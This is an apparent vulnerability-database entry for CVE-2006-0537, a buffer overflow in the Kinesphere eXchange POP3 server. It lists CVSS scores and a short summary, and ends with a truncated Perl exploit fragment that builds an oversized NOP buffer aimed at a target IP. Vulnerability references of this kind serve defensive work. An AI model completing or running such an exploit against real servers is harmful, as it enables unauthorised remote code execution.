7.5
CVSSv2

CVE-2006-0537

Published: 04/02/2006 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in the POP3 server in Kinesphere Corporation eXchange prior to 5.0.060125 allows remote malicious users to execute arbitrary code via a long RCPT TO argument.

Vulnerable Product Search on Vulmon Subscribe to Product

kinesphere corporation exchange pop3 5.0_build_050203

Exploits

#!/usr/bin/perl -w # for educational purposes only use IO::Socket; if ($#ARGV<0) { print "\n write the target IP!! \n\n"; exit; } $buffer2 = "\x90"x1999999; $mailf= "mail"; ...